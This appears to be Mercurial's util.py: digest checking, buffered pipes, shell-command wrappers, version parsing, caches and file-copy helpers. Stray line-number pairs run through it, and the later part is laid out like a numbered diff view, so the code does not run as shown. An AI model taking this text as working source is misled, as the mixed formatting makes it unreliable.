    """Return the bitwise OR of every item in *container* (0 when empty)."""
    combined = 0
    for flags in container:
        combined |= flags
    return combined
192
191
# python 2.6 still have deprecation warning enabled by default. We do not want
# to display anything to standard user so detect if we are running test and
# only use python deprecation warning in this case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
207
206
def nouideprecwarn(msg, version, stacklevel=1):
    """Issue an python native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if not _dowarn:
        return
    suffix = ("\n(compatibility will be dropped after Mercurial-%s,"
              " update your code.)") % version
    warnings.warn(msg + suffix, DeprecationWarning, stacklevel + 1)
217
216
# Mapping of supported digest names to their hashlib constructors.
DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

# sanity check: every preference entry must be a known digest
for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS

class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester(['md5', 'sha1'])
    >>> d.update('foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d['md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d['sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred(['md5', 'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        # feed the data to every registered hash object
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        if key not in DIGESTS:
            # fix: previously formatted the stale module-level loop
            # variable 'k' (left over from the DIGESTS_BY_STRENGTH assert
            # loop above) instead of the requested 'key', so the error
            # always named the wrong digest
            raise Abort(_('unknown digest type: %s') % key)
        return self._hashes[key].hexdigest()

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None
275
274
class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

    d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        data = self._fh.read(length)
        # track everything that passed through, for validate()
        self._digester.update(data)
        self._got += len(data)
        return data

    def validate(self):
        expected, received = self._size, self._got
        if expected != received:
            raise Abort(_('size mismatch: expected %d, got %d') %
                        (expected, received))
        for name, wanted in self._digests.items():
            actual = self._digester[name]
            if wanted != actual:
                # i18n: first parameter is a digest name
                raise Abort(_('%s mismatch: expected %s, got %s') %
                            (name, wanted, actual))
307
306
try:
    # Python 2 provides a builtin buffer type; keep it when present
    buffer = buffer
except NameError:
    # Python 3: emulate with a zero-copy memoryview slice
    def buffer(sliceable, offset=0, length=None):
        view = memoryview(sliceable)
        if length is None:
            return view[offset:]
        return view[offset:offset + length]
315
314
316 closefds = pycompat.osname == 'posix'
315 closefds = pycompat.osname == 'posix'
317
316
318 _chunksize = 4096
317 _chunksize = 4096
319
318
class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class let us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """

    def __init__(self, input):
        self._input = input   # underlying file-like object
        self._buffer = []     # buffered chunks, newest appended last
        self._eof = False     # set once os.read returns no data
        self._lenbuf = 0      # total number of buffered bytes

    @property
    def hasbuffer(self):
        """True is any data is currently buffered

        This will be used externally a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        # delegate to the wrapped pipe
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        # keep filling until 'size' bytes are buffered or EOF is hit
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        if 1 < len(self._buffer):
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapse it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        # lfi: index of the first '\n' in the newest chunk, -1 if absent
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while (not self._eof) and lfi < 0:
            # read more until a newline arrives or the pipe is exhausted
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif 1 < len(self._buffer):
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if 1 < len(self._buffer):
            # collapse all chunks into one before slicing
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            # keep the unconsumed remainder as a single chunk
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        # read from the raw fd (not the Python-level file object) so that
        # no data is hidden inside an interpreter-side buffer
        data = os.read(self._input.fileno(), _chunksize)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)
413
412
def popen2(cmd, env=None, newlines=False):
    """Run *cmd* through the shell; return its (stdin, stdout) pipes."""
    # Setting bufsize to -1 lets the system decide the buffer size.
    # The default for bufsize is 0, meaning unbuffered. This leads to
    # poor performance on Mac OS X: http://bugs.python.org/issue4194
    proc = subprocess.Popen(cmd, shell=True, bufsize=-1,
                            close_fds=closefds,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout
424
423
def popen3(cmd, env=None, newlines=False):
    """Like popen4, but return only the (stdin, stdout, stderr) pipes."""
    pipes = popen4(cmd, env, newlines)
    return pipes[0], pipes[1], pipes[2]
428
427
def popen4(cmd, env=None, newlines=False, bufsize=-1):
    """Run *cmd* through the shell with all three standard streams piped.

    Returns (stdin, stdout, stderr, proc) where proc is the Popen object.
    """
    proc = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
                            close_fds=closefds,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout, proc.stderr, proc
437
436
def version():
    """Return the Mercurial version string, or 'unknown' if unavailable.

    The __version__ module is generated at build time, so it is missing
    when running from an unbuilt source tree.
    """
    try:
        from . import __version__
    except ImportError:
        return 'unknown'
    return __version__.version
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = '3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = '3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = '3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = '3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    # Split the numeric part from the "extra" suffix at the first '+' or
    # '-'.  FIX: the pattern was the non-raw string '[\+-]', whose '\+' is
    # an invalid escape sequence (DeprecationWarning, and a syntax error in
    # future Python 3); use a raw string instead.  '+' needs no escaping
    # inside a character class.
    parts = remod.split(r'[+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            # Stop at the first non-numeric component (e.g. 'rc').
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)
# Formats tried, in order, by the date parser ("parsedate" elsewhere in
# this file).  Order matters: the first matching format wins.
defaultdateformats = (
    # ISO 8601 and friends
    '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
    '%Y-%m-%dT%H:%M',    # without seconds
    '%Y-%m-%dT%H%M%S',   # another awful but legal variant without :
    '%Y-%m-%dT%H%M',     # without seconds
    '%Y-%m-%d %H:%M:%S', # our common legal variant
    '%Y-%m-%d %H:%M',    # without seconds
    '%Y-%m-%d %H%M%S',   # without :
    '%Y-%m-%d %H%M',     # without seconds
    '%Y-%m-%d %I:%M:%S%p',
    '%Y-%m-%d %H:%M',
    '%Y-%m-%d %I:%M%p',
    '%Y-%m-%d',
    # short numeric forms
    '%m-%d',
    '%m/%d',
    '%m/%d/%y',
    '%m/%d/%Y',
    # verbose forms (day/month names)
    '%a %b %d %H:%M:%S %Y',
    '%a %b %d %I:%M:%S%p %Y',
    '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
    '%b %d %H:%M:%S %Y',
    '%b %d %I:%M:%S%p %Y',
    '%b %d %H:%M:%S',
    '%b %d %I:%M:%S%p',
    '%b %d %H:%M',
    '%b %d %I:%M%p',
    '%b %d %Y',
    '%b %d',
    # time-of-day only
    '%H:%M:%S',
    '%I:%M:%S%p',
    '%H:%M',
    '%I:%M%p',
)

# Superset accepted where coarser dates make sense (e.g. revset date()).
extendeddateformats = defaultdateformats + (
    "%Y",
    "%Y-%m",
    "%b",
    "%b %Y",
)
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    argcount = func.__code__.co_argcount
    if argcount == 0:
        # Zero-argument case: a one-slot list doubles as the "computed yet?"
        # flag and the cached value.
        results = []
        def wrapper():
            if not results:
                results.append(func())
            return results[0]
        return wrapper
    memo = {}
    if argcount == 1:
        # Single-argument fast path: key on the argument directly instead
        # of packing/unpacking a tuple.
        def wrapper(arg):
            if arg not in memo:
                memo[arg] = func(arg)
            return memo[arg]
    else:
        def wrapper(*args):
            if args not in memo:
                memo[args] = func(*args)
            return memo[args]

    return wrapper
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([('a', 0), ('b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([('a', 2)])
    >>> d2.keys() # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # Unlike a plain OrderedDict, re-assigning an existing key moves it
        # to the end, giving "last-set" iteration order.
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v
class transactional(object):
    """Base class for making a transactional type into a context manager."""
    # py2-style abstract-class declaration, kept for compatibility.
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Only commit on a clean exit; release() runs unconditionally so an
        # unclosed transaction is aborted.
        try:
            if exc_type is None:
                self.close()
        finally:
            self.release()
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        # The interruption is expected: commit what we have, then let the
        # exception propagate to the caller.
        tr.close()
        raise
    finally:
        tr.release()
@contextlib.contextmanager
def nullcontextmanager():
    """A context manager that does nothing (placeholder for 'with' blocks)."""
    yield
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        self.next = None
        self.prev = None

        # _notset is a module-level sentinel marking an unoccupied node.
        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
    """
    def __init__(self, max):
        self._cache = {}

        # Circular doubly-linked list, seeded with a single empty node that
        # is both head and tail.
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # Walk newest to oldest.  Cache order is convenient, not required.
        node = self._head
        for _unused in range(len(self._cache)):
            yield node.key
            node = node.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        if node is not None:
            # Key already present: replace the value and mark as newest.
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            # Still room in the list: grow it by one node.
            node = self._addcapacity()
        else:
            # At capacity: recycle the last/oldest node.
            node = self._head.prev

            # Evict whatever entry currently occupies it.
            if node.key is not _notset:
                del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # Mark it as the newest entry.  No order adjustment is needed since
        # the node is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        # Occupied nodes form a contiguous run starting at head; stop at the
        # first empty one.
        node = self._head
        while node.key is not _notset:
            node.markempty()
            node = node.next

        self._cache.clear()

    def copy(self):
        result = lrucachedict(self._capacity)
        node = self._head.prev
        # Insert oldest-to-newest so the copy ends up with the same ordering.
        for _unused in range(len(self._cache)):
            result[node.key] = node.value
            node = node.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        Unlinks ``node`` from its current position, splices it back in just
        before the current head, and makes it the new head.  Six pointer
        updates total: unlink (2), relink prev/next (2), and fix up the
        neighbors (2).
        """
        head = self._head
        # Unlink node from its current neighbors.
        node.prev.next = node.next
        node.next.prev = node.prev
        # Splice node in directly before the old head.
        node.prev = head.prev
        # Tempting to write "head" here, but if node is adjacent to head
        # the links rewritten above make that wrong.
        node.next = head.prev.next
        node.next.prev = node
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    results = {}
    lru = collections.deque()
    if func.__code__.co_argcount == 1:
        # Single-argument fast path: key directly on the argument.
        def f(arg):
            if arg not in results:
                # Evict the least-recently-used entry once we exceed 20.
                if len(results) > 20:
                    del results[lru.popleft()]
                results[arg] = func(arg)
            else:
                lru.remove(arg)
            lru.append(arg)
            return results[arg]
    else:
        def f(*args):
            if args not in results:
                if len(results) > 20:
                    del results[lru.popleft()]
                results[args] = func(*args)
            else:
                lru.remove(args)
            lru.append(args)
            return results[args]

    return f
class propertycache(object):
    """Non-data descriptor that computes a value once and caches it on the
    instance, so later accesses bypass the descriptor entirely."""
    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        result = self.func(obj)
        self.cachevalue(obj, result)
        return result

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    out, _err = proc.communicate(s)
    return out
def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.'''
    inname, outname = None, None
    try:
        # Write the input to a temp file the command can read.
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        fp = os.fdopen(infd, pycompat.sysstr('wb'))
        fp.write(s)
        fp.close()
        # Pre-create the output file; the command will overwrite it.
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname)
        cmd = cmd.replace('OUTFILE', outname)
        code = os.system(cmd)
        # On OpenVMS an odd status means success.
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            code = 0
        if code:
            raise Abort(_("command '%s' failed: %s") %
                        (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        # Best-effort cleanup of both temp files.
        for path in (inname, outname):
            try:
                if path:
                    os.unlink(path)
            except OSError:
                pass
# Maps a command prefix to the filter strategy that runs it.
filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
}

def filter(s, cmd):
    "filter a string through a command that transforms its input to its output"
    for prefix, fltr in filtertable.iteritems():
        if cmd.startswith(prefix):
            return fltr(s, cmd[len(prefix):].lstrip())
    # No explicit prefix: default to piping through the command.
    return pipefilter(s, cmd)
def binary(s):
    """return true if a string is binary data"""
    # Heuristic: any embedded NUL byte marks the string as binary.
    if not s:
        return False
    return '\0' in s
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    # min/max shadow the builtins, but the parameter names are part of the
    # public interface and must stay.
    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                min = min << 1
                # Jump straight to the largest power of two <= blen if that
                # is bigger than plain doubling (blen > 0 here, so
                # bit_length() - 1 is the floor of log2).
                nmin = 1 << (blen.bit_length() - 1)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield ''.join(buf)
            blen = 0
            buf = []
    if buf:
        yield ''.join(buf)
# Re-exported so callers can use util.Abort without importing error directly.
Abort = error.Abort
def always(fn):
    """Predicate that returns True for any argument."""
    return True
def never(fn):
    """Predicate that returns False for any argument."""
    return False
def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue have been fixed in 2.7. But it still affect
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        wasenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            # Only re-enable if the collector was on when we started.
            if wasenabled:
                gc.enable()
    return wrapper
if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    def nogc(func):
        return func
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        # Cross-drive paths (Windows) can't be expressed relatively.
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    fromparts = splitpath(n1)
    toparts = n2.split('/')
    fromparts.reverse()
    toparts.reverse()
    # Strip the common leading components (compared from the reversed tails).
    while fromparts and toparts and fromparts[-1] == toparts[-1]:
        fromparts.pop()
        toparts.pop()
    toparts.reverse()
    # One '..' per remaining source component, then descend into the target.
    return pycompat.ossep.join((['..'] * len(fromparts)) + toparts) or '.'
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    if safehasattr(sys, "frozen"):  # new py2exe
        return True
    if safehasattr(sys, "importers"):  # old py2exe
        return True
    return imp.is_frozen(u"__main__")  # tools/freeze
# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

# Tell the i18n machinery where to find translation catalogs.
i18n.setdatapath(datapath)
# Cached path of the 'hg' executable; resolved lazily by hgexecutable().
_hgexecutable = None

def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.
    """
    if _hgexecutable is None:
        hg = encoding.environ.get('HG')
        mainmod = sys.modules[pycompat.sysstr('__main__')]
        if hg:
            # Explicit override via the HG environment variable.
            _sethgexecutable(hg)
        elif mainfrozen():
            if getattr(sys, 'frozen', None) == 'macosx_app':
                # Env variable set by py2app
                _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
            else:
                _sethgexecutable(pycompat.sysexecutable)
        elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
            # Running directly from an 'hg' script.
            _sethgexecutable(pycompat.fsencode(mainmod.__file__))
        else:
            # Fall back to the search path, then to argv[0].
            exe = findexe('hg') or os.path.basename(sys.argv[0])
            _sethgexecutable(exe)
    return _hgexecutable
1066
1065
1067 def _sethgexecutable(path):
1066 def _sethgexecutable(path):
1068 """set location of the 'hg' executable"""
1067 """set location of the 'hg' executable"""
1069 global _hgexecutable
1068 global _hgexecutable
1070 _hgexecutable = path
1069 _hgexecutable = path
1071
1070
1072 def _isstdout(f):
1071 def _isstdout(f):
1073 fileno = getattr(f, 'fileno', None)
1072 fileno = getattr(f, 'fileno', None)
1074 return fileno and fileno() == sys.__stdout__.fileno()
1073 return fileno and fileno() == sys.__stdout__.fileno()
1075
1074
1076 def shellenviron(environ=None):
1075 def shellenviron(environ=None):
1077 """return environ with optional override, useful for shelling out"""
1076 """return environ with optional override, useful for shelling out"""
1078 def py2shell(val):
1077 def py2shell(val):
1079 'convert python object into string that is useful to shell'
1078 'convert python object into string that is useful to shell'
1080 if val is None or val is False:
1079 if val is None or val is False:
1081 return '0'
1080 return '0'
1082 if val is True:
1081 if val is True:
1083 return '1'
1082 return '1'
1084 return str(val)
1083 return str(val)
1085 env = dict(encoding.environ)
1084 env = dict(encoding.environ)
1086 if environ:
1085 if environ:
1087 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1086 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1088 env['HG'] = hgexecutable()
1087 env['HG'] = hgexecutable()
1089 return env
1088 return env
1090
1089
1091 def system(cmd, environ=None, cwd=None, out=None):
1090 def system(cmd, environ=None, cwd=None, out=None):
1092 '''enhanced shell command execution.
1091 '''enhanced shell command execution.
1093 run with environment maybe modified, maybe in different dir.
1092 run with environment maybe modified, maybe in different dir.
1094
1093
1095 if out is specified, it is assumed to be a file-like object that has a
1094 if out is specified, it is assumed to be a file-like object that has a
1096 write() method. stdout and stderr will be redirected to out.'''
1095 write() method. stdout and stderr will be redirected to out.'''
1097 try:
1096 try:
1098 stdout.flush()
1097 stdout.flush()
1099 except Exception:
1098 except Exception:
1100 pass
1099 pass
1101 cmd = quotecommand(cmd)
1100 cmd = quotecommand(cmd)
1102 env = shellenviron(environ)
1101 env = shellenviron(environ)
1103 if out is None or _isstdout(out):
1102 if out is None or _isstdout(out):
1104 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1103 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1105 env=env, cwd=cwd)
1104 env=env, cwd=cwd)
1106 else:
1105 else:
1107 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1106 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1108 env=env, cwd=cwd, stdout=subprocess.PIPE,
1107 env=env, cwd=cwd, stdout=subprocess.PIPE,
1109 stderr=subprocess.STDOUT)
1108 stderr=subprocess.STDOUT)
1110 for line in iter(proc.stdout.readline, ''):
1109 for line in iter(proc.stdout.readline, ''):
1111 out.write(line)
1110 out.write(line)
1112 proc.wait()
1111 proc.wait()
1113 rc = proc.returncode
1112 rc = proc.returncode
1114 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1113 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1115 rc = 0
1114 rc = 0
1116 return rc
1115 return rc
1117
1116
1118 def checksignature(func):
1117 def checksignature(func):
1119 '''wrap a function with code to check for calling errors'''
1118 '''wrap a function with code to check for calling errors'''
1120 def check(*args, **kwargs):
1119 def check(*args, **kwargs):
1121 try:
1120 try:
1122 return func(*args, **kwargs)
1121 return func(*args, **kwargs)
1123 except TypeError:
1122 except TypeError:
1124 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1123 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1125 raise error.SignatureError
1124 raise error.SignatureError
1126 raise
1125 raise
1127
1126
1128 return check
1127 return check
1129
1128
1130 # a whilelist of known filesystems where hardlink works reliably
1129 # a whilelist of known filesystems where hardlink works reliably
1131 _hardlinkfswhitelist = {
1130 _hardlinkfswhitelist = {
1132 'btrfs',
1131 'btrfs',
1133 'ext2',
1132 'ext2',
1134 'ext3',
1133 'ext3',
1135 'ext4',
1134 'ext4',
1136 'hfs',
1135 'hfs',
1137 'jfs',
1136 'jfs',
1138 'reiserfs',
1137 'reiserfs',
1139 'tmpfs',
1138 'tmpfs',
1140 'ufs',
1139 'ufs',
1141 'xfs',
1140 'xfs',
1142 'zfs',
1141 'zfs',
1143 }
1142 }
1144
1143
1145 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1144 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1146 '''copy a file, preserving mode and optionally other stat info like
1145 '''copy a file, preserving mode and optionally other stat info like
1147 atime/mtime
1146 atime/mtime
1148
1147
1149 checkambig argument is used with filestat, and is useful only if
1148 checkambig argument is used with filestat, and is useful only if
1150 destination file is guarded by any lock (e.g. repo.lock or
1149 destination file is guarded by any lock (e.g. repo.lock or
1151 repo.wlock).
1150 repo.wlock).
1152
1151
1153 copystat and checkambig should be exclusive.
1152 copystat and checkambig should be exclusive.
1154 '''
1153 '''
1155 assert not (copystat and checkambig)
1154 assert not (copystat and checkambig)
1156 oldstat = None
1155 oldstat = None
1157 if os.path.lexists(dest):
1156 if os.path.lexists(dest):
1158 if checkambig:
1157 if checkambig:
1159 oldstat = checkambig and filestat.frompath(dest)
1158 oldstat = checkambig and filestat.frompath(dest)
1160 unlink(dest)
1159 unlink(dest)
1161 if hardlink:
1160 if hardlink:
1162 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1161 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1163 # unless we are confident that dest is on a whitelisted filesystem.
1162 # unless we are confident that dest is on a whitelisted filesystem.
1164 try:
1163 try:
1165 fstype = getfstype(os.path.dirname(dest))
1164 fstype = getfstype(os.path.dirname(dest))
1166 except OSError:
1165 except OSError:
1167 fstype = None
1166 fstype = None
1168 if fstype not in _hardlinkfswhitelist:
1167 if fstype not in _hardlinkfswhitelist:
1169 hardlink = False
1168 hardlink = False
1170 if hardlink:
1169 if hardlink:
1171 try:
1170 try:
1172 oslink(src, dest)
1171 oslink(src, dest)
1173 return
1172 return
1174 except (IOError, OSError):
1173 except (IOError, OSError):
1175 pass # fall back to normal copy
1174 pass # fall back to normal copy
1176 if os.path.islink(src):
1175 if os.path.islink(src):
1177 os.symlink(os.readlink(src), dest)
1176 os.symlink(os.readlink(src), dest)
1178 # copytime is ignored for symlinks, but in general copytime isn't needed
1177 # copytime is ignored for symlinks, but in general copytime isn't needed
1179 # for them anyway
1178 # for them anyway
1180 else:
1179 else:
1181 try:
1180 try:
1182 shutil.copyfile(src, dest)
1181 shutil.copyfile(src, dest)
1183 if copystat:
1182 if copystat:
1184 # copystat also copies mode
1183 # copystat also copies mode
